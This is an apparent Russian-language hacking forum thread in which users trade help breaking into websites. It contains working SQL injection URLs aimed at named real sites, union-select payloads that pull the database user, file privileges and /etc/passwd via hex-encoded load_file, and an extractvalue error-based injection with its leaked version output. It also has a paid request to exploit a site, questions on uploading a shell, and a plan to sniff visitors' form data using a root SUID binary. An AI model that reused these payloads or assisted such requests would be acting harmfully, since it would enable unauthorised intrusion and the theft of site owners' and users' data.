покажите файл /wp-admin/.htaccess папки в /wp-content/ все попробовали? соседей искали? что за ОС на сервере? что в файле wp-config.php написано? httpd.conf посмотрели?
На сайте имеется скрипт, в котором не фильтруется $_POST. Такой код: if (isset($_POST["name"])) { echo $_POST["name"]; exit(); } Можно ли через это залить шелл?
Вероятно, например, если вы поднимете свои права в системе с помощью XSS, а затем появится возможность выполнять произвольный код. Вообще, http://php.net/manual/ru/function.echo.php
Кто поможет раскрутить, дам 4 wmz, оч надо) http://www.kunst-forum.ch/suchresultate/?tx_artbase%5Baction%5D=performSearch&tx_artbase%5Bcontroller%5D=Search&cHash=d57aa66360d76c68d7dc4a736c29512a&tx_artbase%5Bsearchfield%5D=Craig ЗЫ интересные символы, когда ошибка появляется и пропадает "?" "Э"
5.0.95-log http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17+--+ snowsoc@server а теперь хочу узнать привилегии юзера и тут завис так http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.user+where+user='snowsoc'+--+ ошибка Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'snowsoc\' --' at line 1 использую hex http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,file_priv,12,13,14,15,16,17+from+mysql.user+where+user=0x736e6f77736f63 ошибка Error 1142 : SELECT command denied to user 'snowsoc'@'server' for table 'user' что эта ошибка значит? проверяю через LOAD_FILE('/etc/passwd') http://www.site.com/index2.php?id=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,load_file%280x2f6574632f706173737764%29,12,13,14,15,16,17--+ выводит страницу сайта и число 10 это значить что привилегии у пользователя есть?
если бы были привилегии, вы бы получили в ответе файл /etc/passwd ошибка значит, что вы не можете сделать запрос к этой бд, потому что ее нет. ознакомтесь со статьей https://forum.antichat.ru/threadnav43966-1-10.html и прежде чем задавать вопрос поищите решение в гугле или поиском по форуму, на этот вопрос отвечали и не раз
Мне вот интересно, а как крутится эта инъекция: Code: comingoutspb.com/ru/materialyi-po-proektu?project=[inj]
Есть рутовый суидник на сайте site.com Интересует вопрос: как снифить данные с info.php и сохранять их в отдельный файл? Вставить снифер в код - не вариант. Поправить код - тоже. Весь код закодирован. Поясню: Пользователь вводит данные на site.com/info.php - как получить эти данные, (данные которые он ввёл на этой странице), имея рутовый суидник, но исключая вариант с изменением/дополнением файла info.php - не вариант.
http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%[email protected]&FE%5Btt_address%5D%5Bname%5D=a'&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=3&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1 Чет вроде скуля не сложная, но немогу раскрутить... ЗЫ при правильном вводе, ошибка пропадает, далее меняете [email protected] на другое мыло
Code: http://www.uwm.edu.pl/pa/index.php?id=30&FE%5Btt_address%5D%5Bemail%[email protected]&FE%5Btt_address%5D%5Bname%5D=lol%27and%28extractvalue%281,concat%280x5c,version%28%29%29%29%29=%271&FE%5Btt_address%5D%5Bmodule_sys_dmail_category%5D=%203&FE%5Btt_address%5D%5Bmodule_sys_dmail_html%5D=1 XPATH syntax error: '\5.5.38-log'
Need help! Имеется уязвимость в скрипте восстановления пароля на почту: PHP: <?php $name=$_POST['name']; $email=$_POST['email']; $sql=mysql_query("select * from users_table where user='$name' and email='$email'"); $col=mysql_num_rows($sql); if($col=='0') { /* вывод ошибки что пользователь не найден */ } else { $password=rand_str(); mysql_query("update users_table set pass='$password' where user='$name' and email='$email'"); $sql=mysql_query("select * from users_table where user='$name'"); $row=mysql_fetch_array($sql); $email_to_send=$row['email']; // --Дальше функция отправки нового пароля на email и вывод сообщения об успешной отправке-- mail("$email_to_send","$message_with_new_pass","From: [email protected]"); echo 'Message Sended'; ?> При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации. Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит. Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей. Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where. Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update?
http://www.gfz-potsdam.de/forschung/ueberblick/departments/department-4/anorganische-und-isotopengeochemie/mitarbeiter/profil/judith-schicks/list/?cHash=dd9ae84d8ccec2384f97ec748975f738&no_cache=1&tx_mkgfzstaffdirectory_normalview%5Bsectionid%5D=18 Кто подберёт колонки?
Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие подскажите как можно подключиться к ссш чтобы выполнять команды? Пробывал по svn через различные клиента , не подключается
